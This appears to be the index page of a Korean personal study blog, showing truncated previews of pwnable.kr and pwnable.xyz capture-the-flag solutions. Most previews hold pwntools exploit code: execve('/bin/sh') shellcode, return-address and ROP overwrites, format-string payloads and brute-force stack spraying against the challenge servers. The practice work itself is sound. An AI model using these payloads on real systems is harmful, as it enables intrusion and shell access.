대충공부한거적어두는블로그

pwnable.kr - [Rookiss] alloca

from pwn import * callme = 0x80485AB # system("/bin/sh") argvs = [p32(callme)*0x1000] env = {} for i in range(0x10): env[str(i)] = p32(callme)*0x7000 size = -80 # -92 ~ -77 stkaddr = 0xffcf5000 # guess stack address while True: p = process(executable="/home/alloca/alloca", env=env, argv=argvs) p.sendline(str(size)) p.sendline("-"+str(0x100000000-stkaddr)) sleep(4) # code 중간중간 sleep(1) 끼어있음, slee..

security/포너블 - pwnable.kr 2023.03.03

pwnable.kr - [Rookiss] simple login

from pwn import * import base64 p = remote("pwnable.kr", 9003) # p = process("./login") pay = b'\x84\x92\x04\x08\x61\x61\x61\x61\x3c\xeb\x11\x08' pay_encoded = base64.b64encode(pay).decode('ascii') # hJIECGFhYWE86xEI # print(pay_encoded) p.sendlineafter('Authenticate : ', pay_encoded) p.interactive() int __cdecl main(int argc, const char **argv, const char **envp) { char v4; // [esp+4h] [ebp-3Ch..

security/포너블 - pwnable.kr 2023.02.27

pwnable.kr - [Rookiss] loveletter

from pwn import * p = remote("pwnable.kr", 9034) # p = process("./loveletter") # protect에 의해 253bytes+';' => 253bytes+'\xe2\x99\xa5\x00' : 1byte overflow pay = 'cat flag ' pay += 'A'*(253-len(pay)) p.sendline(pay+";") p.interactive() int __cdecl main(int argc, const char **argv, const char **envp) { _BYTE v4[256]; // [esp+10h] [ebp-114h] BYREF int v5; // [esp+110h] [ebp-14h] int v6; // [esp+114h..

security/포너블 - pwnable.kr 2023.02.26

pwnable.kr - [Rookiss] echo2

from pwn import * p = remote("pwnable.kr", 9011) # p = process("./echo2") e = ELF("./echo2") # shellcode = "\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05" shellcode = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05" poprbpret = "\x5d\x5d\xc3" free_got = e.got['free'] # 0x6..

security/포너블 - pwnable.kr 2023.02.25

pwnable.kr - [Rookiss] fix

#include // 23byte shellcode from http://shell-storm.org/shellcode/files/shellcode-827.php char sc[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; void shellcode(){ // a buffer we are about to exploit! // [ebp-0x1c] char buf[20]; // prepare shellcode on executable stack! strcpy(buf, sc); // overwrite return address! // [ebp+0x4] = buf+32 *(i..

security/포너블 - pwnable.kr 2023.02.23

pwnable.kr - [Rookiss] echo1

from pwn import * p = remote("pwnable.kr", 9010) # p = process("./echo1") e = ELF("./echo1") jmp_rsp = b"\xff\xe4" # asm('jmp rsp') id = e.symbols['id'] shell_23 = b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05" shell_31 = b"\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05"..

security/포너블 - pwnable.kr 2023.02.23

pwnable.kr - [Rookiss] ascii_easy

from pwn import * argvs = ["" for i in range(2)] # DUMMY + call_execve_addr + action_addr + NULL_addr + NULL_addr pay = b'A'*0x20 + p32(0x5561676a) + p32(0x556b6534) + p32(0x55564a36)*2 argvs[1] = pay p = process(executable="/home/ascii_easy/ascii_easy", argv=argvs) p.interactive() #include #include #include #include #include #include #define BASE ((void*)0x5555e000) int is_ascii(int c){ // 0x80..

security/포너블 - pwnable.kr 2023.02.19

pwnable.kr - [Rookiss] tiny_easy

from pwn import * shellcode = '\x90'*0x1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" # 0xff8~ 영역에 매핑된다 argvs = [ p32(0xffdddfff) ] env = {} argvs.append(shellcode) for i in range(0x100): env[str(i)] = shellcode while True: p = process(executable="/home/tiny_easy/tiny_easy", env=env, argv=argvs) try: p.sendline("ls") p.recv(100) exce..

security/포너블 - pwnable.kr 2023.02.19

pwnable.kr - [Rookiss] fsb

from pwn import * s = ssh(user='fsb', host='pwnable.kr', port=2222, password='guest') p = s.process(executable='/home/fsb/fsb') # p = process("./fsb") # key = 0x0804a060 = 134520928 # key+4 = 134520932 p.sendafter("(1)\n", "%134520928c%14$n") # esp+0x50에 key 주소 p.sendafter("(2)\n", "%134520932c%15$n") # esp+0x54에 key+4 주소 p.sendafter("(3)\n", "A"*15+"%20$n") # 하위 4byte에 0xf p.sendafter("(4)\n", ..

security/포너블 - pwnable.kr 2023.02.18

pwnable.xyz - message

#!/bin/bash for i in {1..100} do output=$(timeout 5s python my_python_file.py) if [[ $output == *"FLAG{"*"}"* ]]; then flag=$(echo "$output" | grep -o "FLAG{[^}]*}") echo "FLAG FOUND: $flag" exit 0 else echo "FLAG NOT FOUND." fi done echo "FLAG NOT FOUND in 100 tries" from pwn import * p = remote("svc.pwnable.xyz", 30017) # p = process("./challenge") p.sendlineafter("Message: ", "minseo") cnry ..

security/포너블 - pwnable.xyz 2023.02.16

대충공부한거적어두는블로그

전체 글 318

티스토리툴바

« 2025/01 »
일	월	화	수	목	금	토
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31